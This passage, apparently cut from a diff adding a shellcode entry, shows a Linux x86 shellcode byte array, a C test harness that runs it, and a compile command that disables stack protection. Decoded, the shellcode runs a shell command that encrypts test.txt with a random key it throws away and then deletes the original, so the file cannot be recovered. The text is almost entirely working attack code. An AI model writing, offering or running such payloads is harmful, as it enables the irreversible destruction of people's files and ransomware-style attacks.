aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt", 0x0a + + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x6d\x76\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x68\x65\x61\x64\x20\x2d\x63\x20\x33\x32\x20\x2f\x64\x65\x76\x2f\x75\x72\x61\x6e\x64\x6f\x6d\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x7c\x20\x6f\x70\x65\x6e\x73\x73\x6c\x20\x61\x65\x73\x2d\x32\x35\x36\x2d\x63\x62\x63\x20\x2d\x65\x20\x2d\x69\x6e\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x6f\x75\x74\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x70\x62\x6b\x64\x66\x32\x20\x2d\x6b\x20\x2d\x20\x26\x26\x20\x72\x6d\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x0a"; + void main() + { + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); + } \ No newline at end of file